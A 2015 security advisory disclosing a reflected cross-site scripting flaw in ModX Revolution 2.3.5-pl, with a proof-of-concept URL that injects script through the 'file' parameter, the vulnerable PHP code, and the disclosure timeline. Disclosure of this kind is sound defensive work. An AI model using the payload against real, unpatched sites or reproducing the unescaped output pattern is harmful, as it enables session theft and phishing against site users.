ModX Revolution 2.3.5-pl: Reflected Cross Site Scripting Vulnerability
Date: 2015-08-17 09:27:031. Introduction
| Affected Product: | ModX Revolution 2.3.5-pl |
| Fixed in: | 2.3.6 |
| Fixed Version Link: | 2.3.6 |
| Vendor Contact: | hello@modx.com |
| Vulnerability Type: | Reflected XSS |
| Remote Exploitable: | Yes |
| Reported to vendor: | 07/14/2015 |
| Disclosed to public: | 08/17/2015 |
| Release mode: | Full disclosure |
| CVE: | n/a |
| Credits | Tim Coen of Curesec GmbH |
2. Vulnerability Description
ModX Revolution 2.3.5-pl is vulnerable to reflected cross site scripting. With this, it is possible to inject and execute arbitrary JavaScript code. This can for example be used by an attacker to inject a JavaScript keylogger, bypass CSRF protection, or perform phishing attacks.
The attack can be exploited by getting the victim to click a link or visit an attacker controlled website.
3. Proof of Concept
The injection takes place into the file GET argument, which is echoed inside script tags.
http://localhost/modx-2.3.5-pl/manager/?a=system/file/edit&file=xsstest",record: {"name":"","basename":"","path":"","size":false,"last_accessed":"Jan 01, 1970 01:00:00 AM","last_modified":"Jan 01, 1970 01:00:00 AM","content":false,"image":false,"is_writable":false,"is_readable":false,"source":1},canSave: 0});});alert(1); </script>&wctx=mgr&source=1
4. Code
manager/controllers/default/system/file/edit.class.php:28
public function loadCustomCssJs() {
$this->addJavascript($this->modx->getOption('manager_url').'assets/modext/sections/system/file/edit.js');
$this->addHtml('<script type="text/javascript">Ext.onReady(function() {
MODx.load({
xtype: "modx-page-file-edit"
,file: "'.$this->filename.'"
,record: '.$this->modx->toJSON($this->fileRecord).'
,canSave: '.($this->canSave ? 1 : 0).'
});
});</script>');
}
5. Solution
This issue was not fixed by the vendor.
Update: According to the vendor, the issue was fixed on github at the day of our report. The fix was part of the 2.3.6 release on August the 18th 2015.
5. Report Timeline
| 07/14/2015 | Informed Vendor about Issue (no reply) |
| 08/13/2015 | Contacted Vendor again (no reply) |
| 08/17/2015 | Disclosed to public | 08/18/2015 | Vendor Releases Fix |